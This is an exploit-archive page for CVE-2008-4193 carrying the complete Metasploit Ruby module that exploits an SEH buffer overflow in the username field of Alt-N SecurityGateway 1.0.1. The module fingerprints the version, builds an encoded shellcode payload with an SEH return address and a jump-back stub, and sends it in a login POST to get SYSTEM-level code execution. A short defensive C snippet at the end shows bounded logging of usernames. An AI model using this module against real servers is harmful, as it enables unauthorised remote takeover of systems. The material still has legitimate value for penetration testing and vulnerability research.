Alt-N SecurityGateway username Buffer Overflow

Date: 31 Dec 2009 00:00:00 | Reported by: jduck | Type: packetstorm | Source: packetstormsecurity.com

Alt-N SecurityGateway buffer overflo

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| canvas | Immunity Canvas: ALTN_SG | 24 Sep 2008 11:42 | canvas |
| Circl | CVE-2008-4193 | 1 Jun 2008 00:00 | circl |
| Check Point Advisories | Alt-N Technologies SecurityGateway Username Buffer Overflow (CVE-2008-4193) | 19 Jun 2008 00:00 | checkpoint_advisories |
| CVE | CVE-2008-4193 | 24 Sep 2008 10:00 | cve |
| Cvelist | CVE-2008-4193 | 24 Sep 2008 10:00 | cvelist |
| Exploit DB | Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit) | 7 Jul 2010 00:00 | exploitdb |
| Metasploit | Alt-N SecurityGateway username Buffer Overflow | 28 Dec 2009 20:38 | metasploit |
| NVD | CVE-2008-4193 | 24 Sep 2008 11:42 | nvd |
| Prion | Stack overflow | 24 Sep 2008 11:42 | prion |
| Saint | Alt-N SecurityGateway username buffer overflow | 18 Jul 2008 00:00 | saint |

```ruby
##
# $Id: altn_securitygateway.rb 8010 2009-12-28 20:38:50Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Alt-N SecurityGateway username Buffer Overflow',
      'Description'    => %q{
          Alt-N SecurityGateway is prone to a buffer overflow condition. This
        is due to insufficient bounds checking on the "username"
        parameter. Successful exploitation could result in code
        execution with SYSTEM level privileges.

        NOTE: This service doesn't restart, you'll only get one shot. However,
        it often survives a successful exploitation attempt.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 8010 $',
      'References'     =>
        [
          [ 'CVE', '2008-4193' ],
          [ 'OSVDB', '45854' ],
          [ 'BID', '29457']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space' => 476,
          # note: 0xd7 might not be translated, but w/e
          'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'),
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::SingleStaticBit,
          'EncoderOptions' =>
            {
              'BitNumber' => 0x5,
              'BitValue' => true,
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic Targeting', { } ],
          # NOTE: the return address must be tolower() safe
          [ 'SecurityGateway 1.0.1 Universal', { 'Ret' => 0x6767756f }], # p/p/r in XceedZip.dll 4.5.77.0
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 02 2008'))

    register_options([Opt::RPORT(4000)], self.class)
  end


  # Identify the target based on the SecurityGateway version number
  def auto_target
    print_status("Attempting to automatically select a target...")
    res = send_request_raw(
      {
        'uri' => '/SecurityGateway.dll'
      }, 10)

    if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
      case $1
      when /1\.0\.1/
        return self.targets[1]
      end
    end

    # Not vulnerable
    return nil
  end


  def exploit

    # handle auto-targeting
    mytarget = target
    if target.name =~ /Automatic/

      mytarget = auto_target
      if mytarget.nil?
        raise RuntimeError, "Unable to automatically select a target"
      end
      print_status("Automatically selected target \"#{mytarget.name}\"")
    end

    # the buffer gets CharLowerBuff()'d and passed to:
    # sprintf(str, "Attempt to login with invalid user name %s from %s", buf, ip_str);

    sploit = payload.encoded
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    sploit = Rex::Text.to_hex(sploit, '%')
    sploit << rand_text_alphanumeric(512)

    post_data = 'RequestedPage=login'
    post_data << '&username=' << sploit
    post_data << '&passwd=world'

    print_status("Sending request...")
    res = send_request_cgi({
      'uri'          => '/SecurityGateway.dll',
      'method'       => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data'         => post_data,
    }, 5)

    handler
  end

end
```
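
The root cause named in the module's comment is an unbounded `sprintf()` of the lowercased username into a fixed-size buffer. As an added example (not code from the module or from Alt-N), here is a bounded version of that logging step; `MAX_USERNAME`, the `log_result` enum and the function name are assumptions, and `tolower()` stands in for `CharLowerBuff()`.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_USERNAME 64   /* assumed policy limit, not taken from the product */

enum log_result { LOG_OK = 0, LOG_REJECTED = -1, LOG_TRUNCATED = 1 };

/* Bounded form of the failed-login log line (hypothetical helper).
 * Rejects over-long names before any copy, lowercases into a fixed
 * local buffer, and never writes more than out_size bytes to out. */
int format_invalid_login(char *out, size_t out_size,
                         const char *username, const char *ip_str)
{
    char name[MAX_USERNAME + 1];
    size_t len = 0, i;
    int n;

    if (out == NULL || out_size == 0)
        return LOG_REJECTED;
    out[0] = '\0';
    if (username == NULL || ip_str == NULL)
        return LOG_REJECTED;

    /* Bounded length scan: stop as soon as the limit is exceeded. */
    while (len <= MAX_USERNAME && username[len] != '\0')
        len++;
    if (len > MAX_USERNAME)
        return LOG_REJECTED;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)username[i];
        /* Mask control bytes so the name cannot split the log line. */
        name[i] = (c < 0x20 || c == 0x7f) ? '?' : (char)tolower(c);
    }
    name[len] = '\0';

    /* snprintf bounds the write; its return value reveals truncation. */
    n = snprintf(out, out_size,
                 "Attempt to login with invalid user name %s from %s",
                 name, ip_str);
    if (n < 0) {
        out[0] = '\0';
        return LOG_REJECTED;
    }
    return ((size_t)n >= out_size) ? LOG_TRUNCATED : LOG_OK;
}
```

A `LOG_REJECTED` result on an over-long `username` is also a useful detection signal to log separately with the source address.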
